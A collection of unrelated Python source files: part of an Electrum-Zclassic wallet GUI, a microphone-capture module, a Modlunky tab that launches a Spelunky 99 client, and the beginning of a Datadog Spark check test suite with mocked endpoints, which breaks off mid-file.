event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum-Zclassic Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def save_transaction_into_wallet(self, tx):
try:
if not self.wallet.add_transaction(tx.txid(), tx):
self.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
self.show_error(e)
return False
else:
self.wallet.save_transactions(write=True)
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
self.msg_box(QPixmap(":icons/offline_tx.png"), None, _('Success'), _("Transaction added to wallet history"))
return True
|
mic.py
|
import abc
import numpy as np
import struct
import audioop
import threading
from . import configuration
try:
# noinspection PyPep8Naming
import Queue as queue
except ImportError:
# noinspection PyUnresolvedReferences
import queue
if configuration.is_raspberry():
import alsaaudio
else:
import pyaudio
CHANNELS = 1
RATE = 16000
MAX_INT16 = np.iinfo(np.int16).max
CHUNK_SIZE = 1000
def create_mic(config):
if configuration.is_raspberry():
return MicAlsa(config.device_sampling_rate, config.device_name)
else:
return MicPortAudio(config.device_sampling_rate)
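# Illustrative usage sketch (not part of the original module): `config` is assumed
# to expose `device_sampling_rate` and `device_name`, as read by create_mic above.
#
#     mic = create_mic(config)
#     for chunk in mic.get_mic_data():
#         handle(chunk)   # each chunk is a float numpy array resampled to RATE (16 kHz)
#
# `handle` is a hypothetical consumer; capture stops once `mic.end` is set to True.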
class Mic(metaclass=abc.ABCMeta):
def __init__(self, device_sampling_rate):
self.state = None
self.device_sampling_rate = device_sampling_rate
self.end = False
self.queue = queue.Queue()
@abc.abstractmethod
def get_mic_data_async(self):
pass
@abc.abstractmethod
def get_mic_data(self):
pass
def to_float(self, data):
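        # Resample from the device's native rate to RATE (16 kHz) with
        # audioop.ratecv, keeping the converter state across calls, then unpack
        # the little-endian int16 samples and normalise them to [-1.0, 1.0].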
chunk, self.state = audioop.ratecv(data, 2, 1, self.device_sampling_rate, RATE, self.state)
data_int = struct.unpack('<' + 'h' * (len(chunk) // 2), chunk)
data_float = np.true_divide(data_int, MAX_INT16)
return data_float
def get_stream(p, callback):
return p.open(format=pyaudio.paInt16,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK_SIZE,
stream_callback=callback)
class MicPortAudio(Mic):
def __init__(self, device_sampling_rate):
Mic.__init__(self, device_sampling_rate)
# noinspection PyUnusedLocal
def callback(self, in_data, frame_count, time_info, status):
data_float = self.to_float(in_data)
self.queue.put(data_float)
return in_data, pyaudio.paAbort if self.end else pyaudio.paContinue
def get_mic_data_async(self):
p = pyaudio.PyAudio()
stream = get_stream(p, self.callback)
stream.start_stream()
while not self.end:
yield self.queue.get()
stream.stop_stream()
stream.close()
p.terminate()
self.queue.join()
def get_mic_data(self):
p = pyaudio.PyAudio()
stream = get_stream(p, None)
while not self.end:
chunk = stream.read(CHUNK_SIZE)
yield self.to_float(chunk)
stream.close()
p.terminate()
class MicAlsa(Mic):
def __init__(self, device_sampling_rate, device_name):
Mic.__init__(self, device_sampling_rate)
self.device_name = device_name
def get_mic_data_async(self):
inp = self.get_input_stream(self.device_name)
producer = threading.Thread(target=lambda: self.worker(inp))
producer.daemon = True
producer.start()
while not self.end:
yield self.queue.get()
inp.close()
self.queue.join()
def get_mic_data(self):
inp = self.get_input_stream(self.device_name)
while not self.end:
l, data = inp.read()
if l > 0:
data_float = self.to_float(data)
yield data_float
            elif l < 0:
                # a negative read length signals an ALSA buffer overrun; the chunk is dropped
                pass
inp.close()
def get_input_stream(self, device):
stream = alsaaudio.PCM(alsaaudio.PCM_CAPTURE, alsaaudio.PCM_NORMAL, device)
stream.setchannels(1)
stream.setrate(RATE)
stream.setformat(alsaaudio.PCM_FORMAT_S16_LE)
stream.setperiodsize(CHUNK_SIZE * self.device_sampling_rate // RATE)
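        # CHUNK_SIZE frames at RATE (16 kHz) is 62.5 ms of audio; scaling by
        # device_sampling_rate / RATE keeps the ALSA period the same duration
        # at the device's native sampling rate.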
return stream
def worker(self, inp):
while not self.end:
l, data = inp.read()
if l > 0:
data_float = self.to_float(data)
self.queue.put(data_float)
class MicFromFile(Mic):
def get_mic_data_async(self):
pass
def get_mic_data(self):
pass
|
s99.py
|
import logging
import subprocess
import time
import threading
import os
import tkinter as tk
from tkinter import ttk, PhotoImage
from PIL import Image, ImageTk
from modlunky2.constants import BASE_DIR, IS_EXE
from modlunky2.ui.widgets import PopupWindow, Tab
from modlunky2.utils import is_windows, tb_info
logger = logging.getLogger("modlunky2")
ICON_PATH = BASE_DIR / "static/images"
def tail_file(file_handle, log_func):
for line in file_handle:
log_func(line.strip())
def s99_client_path():
if IS_EXE:
client_dir = BASE_DIR
else:
client_dir = BASE_DIR / "../../dist"
if is_windows():
return client_dir / "s99-client.exe"
return client_dir / "s99-client"
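# Path note (descriptive): when running as a packaged executable (IS_EXE) the
# client binary is expected alongside BASE_DIR; in a source checkout it is looked
# up in a dist/ directory two levels above BASE_DIR, with is_windows() only
# selecting the ".exe" suffix.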
class S99Client(threading.Thread):
def __init__(
self,
exe_path,
api_token,
):
super().__init__()
self.select_timeout = 0.1
self.shut_down = False
self.exe_path = exe_path
self.api_token = api_token
def run(self):
try:
self._run()
except Exception: # pylint: disable=broad-except
logger.critical("Failed in client thread: %s", tb_info())
def _run(self):
if not self.api_token:
logger.warning("No API Token...")
return
if not self.exe_path.exists():
logger.warning("No exe found...")
return
env = os.environ.copy()
env["SFYI_API_TOKEN"] = self.api_token
logger.info("Launching S99 Client")
cmd = [f"{self.exe_path}"]
client_proc = subprocess.Popen(
cmd,
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
env=env,
)
shutting_down = False
stdout_logger = threading.Thread(
target=tail_file, args=(client_proc.stdout, logger.info)
)
stdout_logger.start()
stderr_logger = threading.Thread(
target=tail_file, args=(client_proc.stderr, logger.warning)
)
stderr_logger.start()
while True:
if not shutting_down and self.shut_down:
shutting_down = True
client_proc.kill()
break
            # poll() returns None while the process is running; an exit code of 0
            # is falsy, so compare against None to detect any exit.
            if client_proc.poll() is not None:
break
time.sleep(0.1)
stdout_logger.join()
stderr_logger.join()
logger.info("Client closed.")
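# Illustrative lifecycle sketch (mirrors how S99Tab below drives this thread):
#
#     client = S99Client(s99_client_path(), api_token)  # api_token comes from the Settings tab
#     client.start()              # launches the subprocess and the stdout/stderr tail threads
#     ...
#     client.shut_down = True     # polled every 0.1 s in _run(); kills the subprocess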
class Help(PopupWindow):
def __init__(self, modlunky_config, *args, **kwargs):
super().__init__("Spelunky 99 Help", modlunky_config, *args, **kwargs)
self.columnconfigure(0, weight=1)
ttk.Label(
self,
text=("Beta User Instructions:"),
font=("Arial", 10, "bold"),
).grid(row=0, column=0, sticky="nwe", padx=5)
ttk.Label(
self,
text=(
"* Click Connect and verify that the log shows you're receiving messages.\n"
"* Download the mod pack per provided instructions.\n"
"* Select the Spelunky 99 Mod on the Playlunky tab and hit Play!\n\n"
"Note: Make sure you have an API token configured in the Settings tab."
),
).grid(row=1, column=0, sticky="nwe", padx=5)
ttk.Separator(self).grid(row=2, column=0, pady=5, sticky="nsew")
ttk.Label(
self,
text=("Credits:"),
font=("Arial", 10, "bold"),
).grid(row=3, column=0, sticky="nwe", padx=5)
ttk.Label(
self,
text=(
"* jeremyhay - Creator of Spelunky 99\n"
"* Xanagear - Design / Promotion\n"
"* garebear - Modlunky / spelunky.fyi Integration\n"
"* JackHasWifi / Spudley - Spelunky 99 Logo\n"
"* The Greeni Porcini - Splash Screen Art\n"
),
).grid(row=4, column=0, sticky="nwe", padx=5)
ttk.Separator(self).grid(row=5, column=0, pady=5, sticky="nsew")
buttons = ttk.Frame(self)
buttons.grid(row=6, column=0, sticky="nsew")
buttons.columnconfigure(0, weight=1)
ok_button = ttk.Button(buttons, text="Ok", command=self.destroy)
ok_button.grid(row=0, column=0, pady=5, sticky="nsew")
class S99Tab(Tab):
def __init__(self, tab_control, modlunky_config, *args, **kwargs):
super().__init__(tab_control, *args, **kwargs)
self.tab_control = tab_control
self.modlunky_config = modlunky_config
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.s99_frame = ttk.LabelFrame(self, text="Spelunky 99")
self.s99_frame.grid(sticky="nsew")
self.s99_frame.rowconfigure(0, minsize=20)
self.s99_frame.rowconfigure(1, weight=0)
self.s99_frame.rowconfigure(2, weight=1)
self.s99_frame.rowconfigure(3, weight=0)
self.s99_frame.rowconfigure(4, minsize=60)
self.s99_frame.columnconfigure(0, weight=1)
self.help_icon = ImageTk.PhotoImage(
Image.open(ICON_PATH / "help.png").resize((24, 24), Image.ANTIALIAS)
)
self.header_frame = ttk.Frame(self.s99_frame)
self.header_frame.grid(row=0, column=0, sticky="nswe")
self.header_frame.rowconfigure(0, weight=1)
self.header_frame.columnconfigure(0, weight=1)
ttk.Label(
self.header_frame,
text=(
"Spelunky 99 is currently in closed beta but will be available soon."
),
anchor="center",
justify="center",
font=("Arial", 12, "bold"),
).grid(row=0, column=0, sticky="nwe", pady=(5, 5), padx=(10, 10))
ttk.Button(
self.header_frame,
padding=1,
image=self.help_icon,
command=self.show_help,
).grid(row=0, column=1, padx=5, pady=5, sticky="e")
ttk.Separator(self.s99_frame).grid(row=1, column=0, sticky="ew")
self.background_img = PhotoImage(
file=BASE_DIR / "static/images/montyfication.png"
)
self.s99_logo = PhotoImage(file=BASE_DIR / "static/images/99logo.png")
self.style = ttk.Style()
background = self.style.lookup("TFrame", "background")
self.canvas = tk.Canvas(self.s99_frame, bg=background)
self.canvas.grid(row=2, column=0, columnspan=2, pady=5, padx=5, sticky="snew")
self.canvas.create_image(0, 0, anchor="nw", image=self.background_img)
self.canvas.create_image(1920, 0, anchor="nw", image=self.background_img)
self.canvas.create_image(1920 * 2, 0, anchor="nw", image=self.background_img)
self.canvas.create_image(15, 15, anchor="nw", image=self.s99_logo)
ttk.Separator(self.s99_frame).grid(row=3, column=0, sticky="ew")
self.button_frame = ttk.Frame(self.s99_frame)
self.button_frame.grid(row=4, column=0, sticky="nswe")
self.button_frame.rowconfigure(0, weight=1)
self.button_frame.columnconfigure(0, weight=1)
self.button_frame.columnconfigure(1, weight=1)
self.button_connect = ttk.Button(
self.button_frame,
text="Connect",
command=self.connect,
state=tk.DISABLED,
style="Thicc.TButton",
)
self.button_connect.grid(row=0, column=0, pady=5, padx=5, sticky="nswe")
self.button_disconnect = ttk.Button(
self.button_frame,
text="Disconnect",
command=self.disconnect,
state=tk.DISABLED,
style="Thicc.TButton",
)
self.button_disconnect.grid(row=0, column=1, pady=5, padx=5, sticky="nswe")
self.client_thread = None
self.after(1000, self.after_client_thread)
self.render_buttons()
def on_load(self):
self.render_buttons()
@property
def client_path(self):
return s99_client_path()
def show_help(self):
Help(self.modlunky_config)
def render_buttons(self):
api_token = self.modlunky_config.config_file.spelunky_fyi_api_token
if not api_token:
self.disable_connect_button()
self.disable_disconnect_button()
return
if self.client_thread is None:
self.enable_connect_button()
self.disable_disconnect_button()
else:
            self.disable_connect_button()
            self.enable_disconnect_button()
def after_client_thread(self):
try:
if self.client_thread is None:
return
if self.client_thread.is_alive():
return
# Process was running but has since exited.
self.client_thread = None
self.render_buttons()
finally:
self.after(1000, self.after_client_thread)
def enable_connect_button(self):
self.button_connect["state"] = tk.NORMAL
def disable_connect_button(self):
self.button_connect["state"] = tk.DISABLED
def enable_disconnect_button(self):
self.button_disconnect["state"] = tk.NORMAL
def disable_disconnect_button(self):
self.button_disconnect["state"] = tk.DISABLED
def disconnect(self):
if self.client_thread:
self.client_thread.shut_down = True
self.render_buttons()
def connect(self):
self.disable_connect_button()
self.enable_disconnect_button()
api_token = self.modlunky_config.config_file.spelunky_fyi_api_token
self.client_thread = S99Client(self.client_path, api_token)
self.client_thread.start()
def client_closed(self):
self.enable_connect_button()
self.disable_disconnect_button()
def destroy(self) -> None:
self.disconnect()
return super().destroy()
|
test_spark.py
|
# (C) Datadog, Inc. 2010-2017
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
import os
from urlparse import urlparse, parse_qsl
from urllib import unquote_plus
from urlparse import urljoin
import json
import BaseHTTPServer
import threading
import ssl
import time
import requests
import mock
import pytest
from datadog_checks.stubs import aggregator as _aggregator
from datadog_checks.spark import SparkCheck
# IDs
YARN_APP_ID = 'application_1459362484344_0011'
SPARK_APP_ID = 'app_001'
CLUSTER_NAME = 'SparkCluster'
APP_NAME = 'PySparkShell'
# URLs for cluster managers
SPARK_APP_URL = 'http://localhost:4040'
SPARK_YARN_URL = 'http://localhost:8088'
SPARK_MESOS_URL = 'http://localhost:5050'
STANDALONE_URL = 'http://localhost:8080'
# SSL test server
SSL_SERVER_PORT = 44443
SSL_SERVER_ADDRESS = 'localhost'
SSL_SERVER_URL = 'https://{}:{}'.format(SSL_SERVER_ADDRESS, SSL_SERVER_PORT)
# URL Paths
SPARK_REST_PATH = 'api/v1/applications'
YARN_APPS_PATH = 'ws/v1/cluster/apps'
MESOS_APPS_PATH = 'frameworks'
STANDALONE_APPS_PATH = 'json/'
STANDALONE_APP_PATH_HTML = 'app/'
# Service Check Names
SPARK_SERVICE_CHECK = 'spark.application_master.can_connect'
YARN_SERVICE_CHECK = 'spark.resource_manager.can_connect'
MESOS_SERVICE_CHECK = 'spark.mesos_master.can_connect'
STANDALONE_SERVICE_CHECK = 'spark.standalone_master.can_connect'
TEST_USERNAME = 'admin'
TEST_PASSWORD = 'password'
CUSTOM_TAGS = ['optional:tag1']
def join_url_dir(url, *args):
'''
Join a URL with multiple directories
'''
for path in args:
url = url.rstrip('/') + '/'
url = urljoin(url, path.lstrip('/'))
return url
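# e.g. (illustrative, matches YARN_SPARK_APP_URL below):
#   join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH)
#   -> 'http://localhost:8088/proxy/application_1459362484344_0011/api/v1/applications'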
class Url(object):
    '''A url object that can be compared with other url objects
without regard to the vagaries of encoding, escaping, and ordering
of parameters in query strings.'''
def __init__(self, url):
parts = urlparse(url)
_query = frozenset(parse_qsl(parts.query))
_path = unquote_plus(parts.path)
parts = parts._replace(query=_query, path=_path)
self.parts = parts
def __eq__(self, other):
return self.parts == other.parts
def __hash__(self):
return hash(self.parts)
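# Illustrative: differently encoded/ordered query strings compare equal, e.g.
#   Url('http://host/a%20b?x=1&y=2') == Url('http://host/a b?y=2&x=1')  # -> True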
# YARN Service URLs
YARN_APP_URL = Url(urljoin(SPARK_YARN_URL, YARN_APPS_PATH) + '?states=RUNNING&applicationTypes=SPARK')
YARN_SPARK_APP_URL = Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH))
YARN_SPARK_JOB_URL = Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'jobs'))
YARN_SPARK_STAGE_URL = \
Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'stages'))
YARN_SPARK_EXECUTOR_URL = \
Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'executors'))
YARN_SPARK_RDD_URL = \
Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'storage/rdd'))
YARN_SPARK_STREAMING_STATISTICS_URL = \
Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'streaming/statistics'))
# Mesos Service URLs
MESOS_APP_URL = Url(urljoin(SPARK_MESOS_URL, MESOS_APPS_PATH))
MESOS_SPARK_APP_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH))
MESOS_SPARK_JOB_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'jobs'))
MESOS_SPARK_STAGE_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'stages'))
MESOS_SPARK_EXECUTOR_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'executors'))
MESOS_SPARK_RDD_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'storage/rdd'))
MESOS_SPARK_STREAMING_STATISTICS_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID,
'streaming/statistics'))
# Spark Standalone Service URLs
STANDALONE_APP_URL = Url(urljoin(STANDALONE_URL, STANDALONE_APPS_PATH))
STANDALONE_APP_HTML_URL = Url(urljoin(STANDALONE_URL, STANDALONE_APP_PATH_HTML) + '?appId=' + SPARK_APP_ID)
STANDALONE_SPARK_APP_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH))
STANDALONE_SPARK_JOB_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'jobs'))
STANDALONE_SPARK_STAGE_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'stages'))
STANDALONE_SPARK_EXECUTOR_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'executors'))
STANDALONE_SPARK_RDD_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'storage/rdd'))
STANDALONE_SPARK_STREAMING_STATISTICS_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID,
'streaming/statistics'))
STANDALONE_SPARK_JOB_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME, 'jobs'))
STANDALONE_SPARK_STAGE_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME, 'stages'))
STANDALONE_SPARK_EXECUTOR_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME, 'executors'))
STANDALONE_SPARK_RDD_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME, 'storage/rdd'))
STANDALONE_SPARK_STREAMING_STATISTICS_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME,
'streaming/statistics'))
FIXTURE_DIR = os.path.join(os.path.dirname(__file__), 'fixtures')
CERTIFICATE_DIR = os.path.join(os.path.dirname(__file__), 'certificate')
@pytest.fixture
def aggregator():
_aggregator.reset()
return _aggregator
def yarn_requests_get_mock(*args, **kwargs):
class MockResponse:
def __init__(self, json_data, status_code):
self.json_data = json_data
self.status_code = status_code
def json(self):
return json.loads(self.json_data)
def raise_for_status(self):
return True
arg_url = Url(args[0])
if arg_url == YARN_APP_URL:
with open(os.path.join(FIXTURE_DIR, 'yarn_apps'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
elif arg_url == YARN_SPARK_APP_URL:
with open(os.path.join(FIXTURE_DIR, 'spark_apps'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
elif arg_url == YARN_SPARK_JOB_URL:
with open(os.path.join(FIXTURE_DIR, 'job_metrics'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
elif arg_url == YARN_SPARK_STAGE_URL:
with open(os.path.join(FIXTURE_DIR, 'stage_metrics'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
elif arg_url == YARN_SPARK_EXECUTOR_URL:
with open(os.path.join(FIXTURE_DIR, 'executor_metrics'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
elif arg_url == YARN_SPARK_RDD_URL:
with open(os.path.join(FIXTURE_DIR, 'rdd_metrics'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
elif arg_url == YARN_SPARK_STREAMING_STATISTICS_URL:
with open(os.path.join(FIXTURE_DIR, 'streaming_statistics'), 'r') as f:
body = f.read()
return MockResponse(body, 200)
def yarn_requests_auth_mock(*args, **kwargs):
# Make sure we're passing in authentication
assert 'auth' in kwargs, "Error, missing authentication"
# Make sure we've got the correct username and password
assert kwargs['auth'] == (TEST_USERNAME, TEST_PASSWORD), "Incorrect username or password"
# Return mocked request.get(...)
return yarn_requests_get_mock(*args, **kwargs)
def mesos_requests_get_mock(*args, **kwargs):
class MockMesosResponse:
def __init__(self, json_data, status_code):
self.json_data = json_data
self.status_code = status_code
def json(self):
return json.loads(self.json_data)
def raise_for_status(self):
return True
arg_url = Url(args[0])
if arg_url == MESOS_APP_URL:
with open(os.path.join(FIXTURE_DIR, 'mesos_apps'), 'r') as f:
body = f.read()
return MockMesosResponse(body, 200)
elif arg_url == MESOS_SPARK_APP_URL:
with open(os.path.join(FIXTURE_DIR, 'spark_apps'), 'r') as f:
body = f.read()
return MockMesosResponse(body, 200)
elif arg_url == MESOS_SPARK_JOB_URL:
with open(os.path.join(FIXTURE_DIR, 'job_metrics'), 'r') as f:
body = f.read()
return MockMesosResponse(body, 200)
elif arg_url == MESOS_SPARK_STAGE_URL:
with open(os.path.join(FIXTURE_DIR, 'stage_metrics'), 'r') as f:
body = f.read()
return MockMesosResponse(body, 200)
elif arg_url == MESOS_SPARK_EXECUTOR_URL:
with open(os.path.join(FIXTURE_DIR, 'executor_metrics'), 'r') as f:
body = f.read()
return MockMesosResponse(body, 200)
elif arg_url == MESOS_SPARK_RDD_URL:
with open(os.path.join(FIXTURE_DIR, 'rdd_metrics'), 'r') as f:
body = f.read()
return MockMesosResponse(body, 200)
elif arg_url == MESOS_SPARK_STREAMING_STATISTICS_URL:
with open(os.path.join(FIXTURE_DIR, 'streaming_statistics'), 'r') as f:
body = f.read()
return MockMesosResponse(body, 200)
def standalone_requests_get_mock(*args, **kwargs):
class MockStandaloneResponse:
text = ''
def __init__(self, json_data, status_code):
self.json_data = json_data
self.status_code = status_code
self.text = json_data
def json(self):
return json.loads(self.json_data)
def raise_for_status(self):
return True
arg_url = Url(args[0])
if arg_url == STANDALONE_APP_URL:
with open(os.path.join(FIXTURE_DIR, 'spark_standalone_apps'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_APP_HTML_URL:
with open(os.path.join(FIXTURE_DIR, 'spark_standalone_app'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_APP_URL:
with open(os.path.join(FIXTURE_DIR, 'spark_apps'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_JOB_URL:
with open(os.path.join(FIXTURE_DIR, 'job_metrics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_STAGE_URL:
with open(os.path.join(FIXTURE_DIR, 'stage_metrics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_EXECUTOR_URL:
with open(os.path.join(FIXTURE_DIR, 'executor_metrics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_RDD_URL:
with open(os.path.join(FIXTURE_DIR, 'rdd_metrics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_STREAMING_STATISTICS_URL:
with open(os.path.join(FIXTURE_DIR, 'streaming_statistics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
def standalone_requests_pre20_get_mock(*args, **kwargs):
class MockStandaloneResponse:
text = ''
def __init__(self, json_data, status_code):
self.json_data = json_data
self.status_code = status_code
self.text = json_data
def json(self):
return json.loads(self.json_data)
def raise_for_status(self):
return True
arg_url = Url(args[0])
if arg_url == STANDALONE_APP_URL:
with open(os.path.join(FIXTURE_DIR, 'spark_standalone_apps'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_APP_HTML_URL:
with open(os.path.join(FIXTURE_DIR, 'spark_standalone_app'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_APP_URL:
with open(os.path.join(FIXTURE_DIR, 'spark_apps_pre20'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_JOB_URL:
return MockStandaloneResponse("{}", 404)
elif arg_url == STANDALONE_SPARK_STAGE_URL:
return MockStandaloneResponse("{}", 404)
elif arg_url == STANDALONE_SPARK_EXECUTOR_URL:
return MockStandaloneResponse("{}", 404)
elif arg_url == STANDALONE_SPARK_RDD_URL:
return MockStandaloneResponse("{}", 404)
elif arg_url == STANDALONE_SPARK_STREAMING_STATISTICS_URL:
return MockStandaloneResponse("{}", 404)
elif arg_url == STANDALONE_SPARK_JOB_URL_PRE20:
with open(os.path.join(FIXTURE_DIR, 'job_metrics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_STAGE_URL_PRE20:
with open(os.path.join(FIXTURE_DIR, 'stage_metrics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_EXECUTOR_URL_PRE20:
with open(os.path.join(FIXTURE_DIR, 'executor_metrics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_RDD_URL_PRE20:
with open(os.path.join(FIXTURE_DIR, 'rdd_metrics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
elif arg_url == STANDALONE_SPARK_STREAMING_STATISTICS_URL_PRE20:
with open(os.path.join(FIXTURE_DIR, 'streaming_statistics'), 'r') as f:
body = f.read()
return MockStandaloneResponse(body, 200)
CHECK_NAME = 'spark'
YARN_CONFIG = {
'spark_url': 'http://localhost:8088',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_yarn_mode',
'tags': list(CUSTOM_TAGS),
}
YARN_AUTH_CONFIG = {
'spark_url': 'http://localhost:8088',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_yarn_mode',
'tags': list(CUSTOM_TAGS),
'username': TEST_USERNAME,
'password': TEST_PASSWORD,
}
MESOS_CONFIG = {
'spark_url': 'http://localhost:5050',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_mesos_mode',
'tags': list(CUSTOM_TAGS),
}
MESOS_FILTERED_CONFIG = {
'spark_url': 'http://localhost:5050',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_mesos_mode',
'spark_ui_ports': [1234]
}
STANDALONE_CONFIG = {
'spark_url': 'http://localhost:8080',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode'
}
STANDALONE_CONFIG_PRE_20 = {
'spark_url': 'http://localhost:8080',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode',
'spark_pre_20_mode': 'true'
}
SSL_CONFIG = {
'spark_url': SSL_SERVER_URL,
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode'
}
SSL_NO_VERIFY_CONFIG = {
'spark_url': SSL_SERVER_URL,
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode',
'ssl_verify': False
}
SSL_CERT_CONFIG = {
'spark_url': SSL_SERVER_URL,
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode',
'ssl_verify': os.path.join(CERTIFICATE_DIR, 'cert.cert')
}
SPARK_JOB_RUNNING_METRIC_VALUES = {
'spark.job.count': 2,
'spark.job.num_tasks': 20,
'spark.job.num_active_tasks': 30,
'spark.job.num_completed_tasks': 40,
'spark.job.num_skipped_tasks': 50,
